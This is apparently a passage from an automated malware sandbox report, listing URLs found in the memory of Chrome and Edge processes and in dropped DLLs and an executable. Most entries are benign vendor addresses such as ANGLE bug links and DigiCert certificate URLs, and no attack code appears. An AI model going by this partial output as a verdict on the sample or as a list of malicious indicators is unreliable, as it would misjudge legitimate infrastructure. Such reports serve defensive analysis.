Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881(
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881A
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881D
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901il
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906O
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048C
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439I
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860J
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000004.00000003.1460703332.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460729960.00001B4400AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1459871873.00001B4400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1558535872.00001A3C0035C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.1558216996.00001B4400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/View/MainWindow.xaml
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/View/MainWindow.xamld
Source: chrome.exe, 00000004.00000002.1630899029.00001B4400A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/View/MainWindow.xaml
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/View/MainWindow.xamld
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar/view/mainwindow.baml
Source: RoamingEBFBKKJECA.exe, 00000015.00000002.1851972635.0000000002491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar/view/mainwindow.bamld
Source: chrome.exe, 00000004.00000002.1549279330.00001B4400093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000003.1463041147.00001B4401024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463190127.00001B4401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463142331.00001B4400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463086803.00001B4401034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
